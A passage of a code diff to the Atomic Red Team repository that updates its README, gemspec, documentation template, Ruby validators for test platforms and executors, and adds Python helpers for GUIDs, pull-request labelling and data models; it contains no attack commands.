-      coffee-script-source (~> 1.11.1)
-    jekyll-commonmark (1.3.1)
-      commonmarker (~> 0.14)
-      jekyll (>= 3.7, < 5.0)
-    jekyll-commonmark-ghpages (0.1.6)
-      commonmarker (~> 0.17.6)
-      jekyll-commonmark (~> 1.2)
-      rouge (>= 2.0, < 4.0)
-    jekyll-default-layout (0.1.4)
-      jekyll (~> 3.0)
-    jekyll-feed (0.15.1)
-      jekyll (>= 3.7, < 5.0)
-    jekyll-gist (1.5.0)
-      octokit (~> 4.2)
-    jekyll-github-metadata (2.13.0)
-      jekyll (>= 3.4, < 5.0)
-      octokit (~> 4.0, != 4.4.0)
-    jekyll-mentions (1.6.0)
-      html-pipeline (~> 2.3)
-      jekyll (>= 3.7, < 5.0)
-    jekyll-optional-front-matter (0.3.2)
-      jekyll (>= 3.0, < 5.0)
-    jekyll-paginate (1.1.0)
-    jekyll-readme-index (0.3.0)
-      jekyll (>= 3.0, < 5.0)
-    jekyll-redirect-from (0.16.0)
-      jekyll (>= 3.3, < 5.0)
-    jekyll-relative-links (0.6.1)
-      jekyll (>= 3.3, < 5.0)
-    jekyll-remote-theme (0.4.2)
-      addressable (~> 2.0)
-      jekyll (>= 3.5, < 5.0)
-      jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
-      rubyzip (>= 1.3.0, < 3.0)
-    jekyll-sass-converter (1.5.2)
-      sass (~> 3.4)
-    jekyll-seo-tag (2.6.1)
-      jekyll (>= 3.3, < 5.0)
-    jekyll-sitemap (1.4.0)
-      jekyll (>= 3.7, < 5.0)
-    jekyll-swiss (1.0.0)
-    jekyll-theme-architect (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-cayman (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-dinky (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-hacker (0.1.2)
-      jekyll (> 3.5, < 5.0)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-leap-day (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-merlot (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-midnight (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-minimal (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-modernist (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-primer (0.5.4)
-      jekyll (> 3.5, < 5.0)
-      jekyll-github-metadata (~> 2.9)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-slate (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-tactile (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-theme-time-machine (0.1.1)
-      jekyll (~> 3.5)
-      jekyll-seo-tag (~> 2.0)
-    jekyll-titles-from-headings (0.5.3)
-      jekyll (>= 3.3, < 5.0)
-    jekyll-watch (2.2.1)
-      listen (~> 3.0)
-    jemoji (0.12.0)
-      gemoji (~> 3.0)
-      html-pipeline (~> 2.2)
-      jekyll (>= 3.0, < 5.0)
-    kramdown (2.3.0)
-      rexml
-    kramdown-parser-gfm (1.1.0)
-      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.3.0)
-      rb-fsevent (~> 0.10, >= 0.10.3)
-      rb-inotify (~> 0.9, >= 0.9.10)
-    mercenary (0.3.6)
-    mini_portile2 (2.4.0)
-    minima (2.5.1)
-      jekyll (>= 3.5, < 5.0)
-      jekyll-feed (~> 0.9)
-      jekyll-seo-tag (~> 2.1)
-    minitest (5.14.2)
-    multipart-post (2.1.1)
-    nokogiri (1.10.10)
-      mini_portile2 (~> 2.4.0)
-    octokit (4.19.0)
-      faraday (>= 0.9)
-      sawyer (~> 0.8.0, >= 0.5.3)
-    pathutil (0.16.2)
-      forwardable-extended (~> 2.6)
-    public_suffix (3.1.1)
-    rb-fsevent (0.10.4)
-    rb-inotify (0.10.1)
-      ffi (~> 1.0)
-    rexml (3.2.4)
-    rouge (3.23.0)
-    ruby-enum (0.8.0)
-      i18n
-    ruby2_keywords (0.0.2)
-    rubyzip (2.3.0)
-    safe_yaml (1.0.5)
-    sass (3.7.4)
-      sass-listen (~> 4.0.0)
-    sass-listen (4.0.0)
-      rb-fsevent (~> 0.9, >= 0.9.4)
-      rb-inotify (~> 0.9, >= 0.9.7)
-    sawyer (0.8.2)
-      addressable (>= 2.3.5)
-      faraday (> 0.8, < 2.0)
-    simpleidn (0.1.1)
-      unf (~> 0.1.4)
-    terminal-table (1.8.0)
-      unicode-display_width (~> 1.1, >= 1.1.1)
-    thread_safe (0.3.6)
-    typhoeus (1.4.0)
-      ethon (>= 0.9.0)
-    tzinfo (1.2.8)
-      thread_safe (~> 0.1)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.7.7)
-    unicode-display_width (1.7.0)
-    zeitwerk (2.4.1)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  atomic-red-team!
-  github-pages
-
-BUNDLED WITH
-   1.17.3

README.md

@@ -1,59 +1,45 @@
 <p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
 
 # Atomic Red Team
-[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
 
-Atomic Red Team allows every security team to test their controls by executing simple
-"atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org)).
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1773-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
-## Philosophy
 
-Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
-focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
+Atomic Red Team™ is a library of tests mapped to the
+[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
+Atomic Red Team to quickly, portably, and reproducibly test their environments.
 
-Three key beliefs made up the Atomic Red Team charter:
-- **Teams need to be able to test everything from specific technical controls to outcomes.**
-  Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
-  what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we
-  do believe in knowing our blind spots.
+## Get started
 
-- **We should be able to run a test in less than five minutes.**
-  Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
-  We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
-  run in a few minutes.
+You can execute atomic tests directly from the command line, no installation
+required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
+page of our wiki.
 
-  The best test is the one you actually run.
+For a more robust testing experience, consider using an execution framework like
+[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
 
-- **We need to keep learning how adversaries are operating.**
-  Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing
-  their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
-  which makes the community working together essential to making us all better.
+## Learn more
 
-See: https://atomicredteam.io
+The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
 
-## Having trouble?
+For information about the philosophy and development of Atomic Red Team, visit
+our website at <https://atomicredteam.io>.
 
-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
+To stay up to date on all things Atomic Red Team, sign up for the Atomic Newsletter: https://redcanary.com/atomic-newsletter/
 
-## Getting Started
+## Contribute to Atomic Red Team
 
-* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
-* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
-  - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
-  - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
-  - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
-* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
-* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
-    * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
+Atomic Red Team is open source and community developed. If you're interested in
+becoming a contributor, check out these resources:
 
-## Code of Conduct
+- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
+  with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
+  before you join.
+- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
+- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+  for more information about contributing directly to this repository.
+- Check the [license](LICENSE.txt) for information regarding the distribution
+  and modification of Atomic Red Team.
+- Contribute to linux atomics quickly from GitHub Codespaces. For more details, click [here](https://github.com/redcanaryco/atomic-red-team/wiki/Github-Codespaces)
 
-In order to have a more open and welcoming community, Atomic Red Team adheres to a
-[code of conduct](CODE_OF_CONDUCT.md).
-
-## License
-
-See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/redcanaryco/atomic-red-team)

atomic-red-team.gemspec

@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
   s.name        = 'atomic-red-team'
   s.version     = '1.0'
   s.authors     = ['Red Canary', 'Casey Smith', 'Mike Haag']
-  s.email       = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
+  s.email       = ['it@redcanary.com', 'opensource@redcanary.com']
   s.summary     = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
   s.license     = "MIT"
   s.homepage    = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
   s.require_paths = %w(atomic_red_team)
 
   s.add_development_dependency 'github-pages'
-end
+end

atomic_red_team/atomic_doc_template.md.erb

@@ -1,20 +1,20 @@
-# <%= technique['identifier'] %> - <%= technique['name'] -%>
+# <%= technique['identifier'] %> - <%= technique['name'] %>
 
-## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
-<blockquote><%= technique['description'] %></blockquote>
+## Description from ATT&CK
+<% attack_description_lines = technique['description'].gsub("%\\<", "%<").gsub(/<code>.*?<\/code>/) { |match| match.gsub('~', '\~') } %>
+<% attack_description_lines.lines.each do |desc_line| %>> <%= desc_line.strip %>
+<% end %>
+[Source](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
 
 ## Atomic Tests
+
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
-<% title = "Atomic Test ##{test_number+1} - #{test['name']}" %>
-- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
+<% title = "Atomic Test ##{test_number+1}: #{test['name']}" %>- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
 <% end %>
-
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
-<br/>
-
-## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
-<%= test['description'].strip -%>
+### Atomic Test #<%= test_number+1 %>: <%= test['name'] %>
 
+<%= test['description'].strip %>
 
 **Supported Platforms:** <%= test['supported_platforms'].collect do |p|
   case p
@@ -25,13 +25,14 @@
   end
 end.join(', ') %>
 
+**auto_generated_guid:** `<%= test['auto_generated_guid'] %>`
 <%def cleanup(input)
     input.to_s.strip.gsub(/\\/,"&#92;")
-end%>
-
+end -%>
 <% if test['input_arguments'].to_a.count > 0 %>
-#### Inputs:
-| Name | Description | Type | Default Value | 
+#### Inputs
+
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 <% test['input_arguments'].each do |arg_name, arg_options| -%>
 | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -39,13 +40,11 @@ end%>
 <% end -%>
 
 <%- if test['executor']['name'] == 'manual' -%>
-#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
+#### Attack Commands: Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
 
 <%= test['executor']['steps'] %>
 <%- else -%>
-
-#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
-
+#### Attack Commands: Run with `<%= test['executor']['name'] %>`!<%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin)<%- end -%>
 <%def get_language(executor)
   language = executor
   if executor == "command_prompt"
@@ -62,30 +61,31 @@ end%>
 <%- end -%>
 
 <%- if test['executor']['cleanup_command'] != nil -%>
-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```<%= get_language(test['executor']['name']) %>
 <%= test['executor']['cleanup_command'].to_s.strip %>
 ```
-<%- end -%>
+<% end -%>
+<% if test['dependencies'].to_a.count > 0 -%>
+<% dependency_executor = test['executor']['name'] -%>
 
-<% if test['dependencies'].to_a.count > 0 %>
-<% dependency_executor = test['executor']['name'] %>
-#### Dependencies:  Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
+#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
 <% test['dependencies'].each do | dep | -%>
+
 ##### Description: <%= dep['description'].strip  %>
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```<%= get_language(dependency_executor) %>
-<%= dep['prereq_command'].strip %> 
+<%= dep['prereq_command'].strip %>
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```<%= get_language(dependency_executor) %>
 <%= dep['get_prereq_command'].strip  %>
 ```
+<% end %>
 <% end -%>
-<% end -%>
-
-
-
-
-<br/>
 <%- end -%>

atomic_red_team/atomic_red_team.rb

@@ -29,6 +29,29 @@ class AtomicRedTeam
     end
   end
 
+  #
+  # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
+  #
+  def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
+    technique_identifier = if technique_or_technique_identifier.is_a? Hash
+      ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
+    else
+      technique_or_technique_identifier
+    end
+
+    test_list = Array.new
+    atomic_tests.find do |atomic_yaml| 
+      if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
+        atomic_yaml['atomic_tests'].each do |a_test|
+          if a_test["supported_platforms"].include?(platform[:platform])
+              test_list.append(a_test)
+          end
+        end
+      end
+    end
+    test_list
+  end
+
   #
   # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
   #
@@ -55,18 +78,18 @@ class AtomicRedTeam
     yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
     markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
 
-    if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
+    if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exist? markdown_file)
       # we have a file for this technique, so link to it's Markdown file
       "[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
     else
       # we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
-      "#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
+      "#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
     end
   end
 
   def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
     has_test_for_platform = false
-    if File.exists? yaml_file
+    if File.exist? yaml_file
       yaml = YAML.load_file(yaml_file)
       yaml['atomic_tests'].each_with_index do |atomic, i|
         if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
@@ -108,7 +131,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
       raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
   
-      valid_supported_platforms = ['windows', 'macos', 'linux']
+      valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
       atomic['supported_platforms'].each do |platform|
         if !valid_supported_platforms.include?(platform)
           raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
@@ -142,7 +165,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
       raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
   
-      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
+      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
       case executor['name']
         when 'manual'
           raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +175,7 @@ class AtomicRedTeam
                                          string: executor['steps'],
                                          string_description: "atomic_tests[#{i}].executor.steps"
 
-        when 'command_prompt', 'sh', 'bash', 'powershell'
+        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
           raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
           raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
 

atomic_red_team/atomic_test_template.yaml

@@ -1,36 +0,0 @@
----
-attack_technique: TODO
-display_name: TODO
-
-atomic_tests:
-- name: TODO
-  description: |
-    TODO
-
-  supported_platforms:
-    - windows
-    - macos
-    - linux
-
-  input_arguments:
-    output_file:
-      description: TODO
-      type: todo
-      default: TODO
-
-  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
-  dependencies: # (optional)
-    - description: |
-        TODO
-      prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
-        TODO
-      get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
-        TODO
-
-  executor:
-    name: command_prompt
-    elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
-    command: | # these are the actaul attack commands, at least one command must be provided
-      TODO
-    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
-      TODO

atomic_red_team/attack_api.rb

@@ -75,9 +75,11 @@ class Attack
     techniques_by_tactic = Hash.new {|h, k| h[k] = []}
     techniques.each do |technique|
       next unless !technique['x_mitre_platforms'].nil?
-      next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
+      next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
+      next unless technique.fetch('revoked', false) == false
+      next unless technique.fetch('x_mitre_deprecated', false) == false
 
-      technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
+      technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
         techniques_by_tactic[tactic.fetch('phase_name')] << technique
       end
     end
@@ -88,8 +90,10 @@ class Attack
   # Returns a list of all ATT&CK techniques
   #
   def techniques
+    return @techniques unless @techniques.nil?
+
     # pull out the attack pattern objects
-    attack_stix.fetch("objects").select do |item| 
+    @techniques = attack_stix.fetch("objects").select do |item|
       item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
         references['source_name'] == 'mitre-attack'
       end
@@ -105,7 +109,7 @@ class Attack
     @attack_stix ||= begin
       # load the full attack library
       local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
-      if File.exists? local_attack_json_to_try
+      if File.exist? local_attack_json_to_try
         JSON.parse File.read(local_attack_json_to_try)
       else
         JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read

atomic_red_team/common.py

@@ -0,0 +1,5 @@
+from os.path import dirname, realpath
+
+base_path = dirname(dirname(realpath(__file__)))
+atomics_path = f"{base_path}/atomics"
+used_guids_file = f"{atomics_path}/used_guids.txt"

atomic_red_team/guid.py

@@ -0,0 +1,45 @@
+import re
+import uuid
+from typing import List
+
+from ruamel.yaml import YAML
+
+from atomic_red_team.common import used_guids_file
+
+yaml = YAML(typ="safe")
+
+
+def get_unique_guid(guids: List[str]):
+    # This function should return a unique GUID that's not in the used_guids_file.
+    guid = str(uuid.uuid4())
+    if guid not in guids:
+        with open(used_guids_file, "a") as f:  # append mode
+            f.write(f"{guid}\n")
+        return guid
+    else:
+        return get_unique_guid(guids)
+
+
+def generate_guids_for_yaml(path, get_guid):
+    with open(path, "r") as file:
+        og_text = file.read()
+
+    # Add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
+    text = re.sub(
+        r"(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))",
+        lambda m: f"{m.group(1)}\n{m.group(2).replace('-', ' ')}auto_generated_guid:",
+        og_text,
+        flags=re.MULTILINE,
+    )
+
+    # Fill the "auto_generated_guid:" element in if it doesn't contain a guid
+    text = re.sub(
+        r"(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$",
+        lambda m: f"{m.group(1)} {get_guid()}",
+        text,
+        flags=re.MULTILINE,
+    )
+    if text != og_text:
+        with open(path, "wb") as file:
+            # using wb mode instead of w. If not, the end of line characters are auto-converted to OS specific ones.
+            file.write(text.encode())

atomic_red_team/labels.py

@@ -0,0 +1,163 @@
+import fnmatch
+import json
+import os
+import re
+from dataclasses import dataclass
+
+import requests
+import yaml
+from yaml.loader import SafeLoader
+
+
+def get_technique_from_filename(filename):
+    """Returns technique(Txxx.xxx) from the filename specified"""
+    return re.findall(r"T[.\d]{4,8}", filename)[0]
+
+
+@dataclass
+class ChangedAtomic:
+    """Returns atomic technique with test number which can be later used to run atomics in CI/CD pipelines."""
+
+    technique: str
+    test_number: int
+    data: dict
+
+
+class SafeLineLoader(SafeLoader):
+    def construct_mapping(self, node, deep=False):
+        """Add line number to each block of the atomic test."""
+        mapping = super(SafeLineLoader, self).construct_mapping(node, deep=deep)
+        # Add 1 so line numbering starts at 1
+        mapping["__line__"] = node.start_mark.line + 1
+        return mapping
+
+
+class GithubAPI:
+    labels = {
+        "windows": "windows",
+        "macos": "macOS",
+        "linux": "linux",
+        "azure-ad": "ADFS",
+        "containers": "containers",
+        "iaas:gcp": "cloud",
+        "iaas:aws": "cloud",
+        "iaas:azure": "cloud",
+        "office-365": "cloud",
+        "google-workspace": "cloud",
+    }
+
+    maintainers = {
+        "windows": ["clr2of8", "MHaggis", "cyberbuff"],
+        "linux": ["josehelps", "cyberbuff"],
+        "macos": ["josehelps", "cyberbuff"],
+        "containers": ["patel-bhavin"],
+        "iaas:gcp": ["patel-bhavin"],
+        "iaas:aws": ["patel-bhavin"],
+        "iaas:azure": ["patel-bhavin"],
+        "azure-ad": ["patel-bhavin"],
+        "google-workspace": ["patel-bhavin"],
+        "office-365": ["patel-bhavin"],
+    }
+
+    def __init__(self, token):
+        self.token = token
+
+    @property
+    def headers(self):
+        return {
+            "Authorization": f"Bearer {self.token}",
+            "X-GitHub-Api-Version": "2022-11-28",
+            "Accept": "application/vnd.github+json",
+        }
+
+    def get_atomic_with_lines(self, file_url: str):
+        """Get Atomic Technique along with line number for each of the atomics."""
+        r = requests.get(file_url, headers=self.headers)
+        assert r.status_code == 200
+        return yaml.load(r.text, Loader=SafeLineLoader)
+
+    def get_files_for_pr(self, pr):
+        """Get new and modified files in the `atomics` directory changed in a PR."""
+        response = requests.get(
+            f"https://api.github.com/repos/{os.getenv('GITHUB_REPOSITORY')}/pulls/{pr}/files",
+            headers=self.headers,
+            timeout=15,
+        )
+        assert response.status_code == 200
+        files = response.json()
+        return filter(
+            lambda x: x["status"] in ["added", "modified"]
+            and fnmatch.fnmatch(x["filename"], "atomics/T*/T*.yaml"),
+            files,
+        )
+
+    def get_tests_changed(self, pr: str):
+        """Get all the tests changed in a PR"""
+        tests = []
+        start = 0
+        files = self.get_files_for_pr(pr)
+        for file in files:
+            data = self.get_atomic_with_lines(file["raw_url"])
+            technique = get_technique_from_filename(file["filename"])
+            if file["status"] == "added":
+                # New file; run the entire technique; Invoke-AtomicTest Txxxx
+                tests += [
+                    ChangedAtomic(technique=technique, test_number=index + 1, data=t)
+                    for index, t in enumerate(data["atomic_tests"])
+                ]
+            else:
+                changed_lines = []
+                count = 0
+                for line in file["patch"].split("\n"):
+                    if line.startswith("@@"):
+                        x, y = re.findall(r"\d{1,3},\d{1,3}", line)
+                        start = int(x.split(",")[0])
+                        count = -1
+                    elif line.startswith("+"):  # only take count of added lines
+                        changed_lines.append(start + count)
+                    elif line.startswith("-"):
+                        count -= 1
+                    count += 1
+                atomics = data["atomic_tests"]
+                for index, t in enumerate(atomics):
+                    curr_atomic_start = atomics[index]["__line__"]
+                    if index + 1 < len(atomics):
+                        curr_atomic_end = atomics[index + 1]["__line__"]
+                    else:
+                        curr_atomic_end = start + 60
+                    changes_in_current_atomic = [
+                        i
+                        for i in changed_lines
+                        if i > curr_atomic_start and i < curr_atomic_end
+                    ]
+                    if len(changes_in_current_atomic) > 0:
+                        tests.append(
+                            ChangedAtomic(
+                                technique=technique, test_number=index + 1, data=t
+                            )
+                        )
+
+        return tests
+
+    def save_labels_and_maintainers(self, pr):
+        """Saves labels and maintainers into `pr/labels.json` which would be later used by a workflow run."""
+        tests = self.get_tests_changed(pr)
+        platforms = set()
+        for t in tests:
+            platforms.update(t.data["supported_platforms"])
+        labels = []
+        maintainers = []
+        for p in platforms:
+            if p in self.labels:
+                labels.append(self.labels[p])
+            if p in self.maintainers:
+                maintainers += self.maintainers[p]
+        os.mkdir("pr")
+
+        with open("pr/changedfiles.json", "w") as f:
+            x = [{"name": t.technique, "test_number": t.test_number} for t in tests]
+            f.write(json.dumps(x))
+
+        with open("pr/labels.json", "w") as f:
+            j = {"pr": pr, "labels": labels, "maintainers": maintainers}
+            f.write(json.dumps(j))

atomic_red_team/models.py

@@ -0,0 +1,267 @@
+import re
+from functools import reduce
+from typing import Dict, List, Literal, Optional, Union
+from uuid import UUID
+
+from pydantic import (
+    AnyUrl,
+    BaseModel,
+    ConfigDict,
+    Field,
+    IPvAnyAddress,
+    StrictFloat,
+    StringConstraints,
+    conlist,
+    constr,
+    field_serializer,
+    field_validator,
+    model_validator,
+)
+from pydantic_core import PydanticCustomError
+from pydantic_core.core_schema import ValidationInfo
+from typing_extensions import Annotated, TypedDict
+
+InputArgType = Literal["url", "string", "float", "integer", "path"]
+Platform = Literal[
+    "windows",
+    "macos",
+    "linux",
+    "office-365",
+    "azure-ad",
+    "google-workspace",
+    "saas",
+    "iaas",
+    "containers",
+    "iaas:gcp",
+    "iaas:azure",
+    "iaas:aws",
+    "esxi",
+]
+ExecutorType = Literal["manual", "powershell", "sh", "bash", "command_prompt"]
+DomainName = Annotated[
+    str,
+    StringConstraints(
+        pattern=r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"
+    ),
+]
+
+AttackTechniqueID = Annotated[
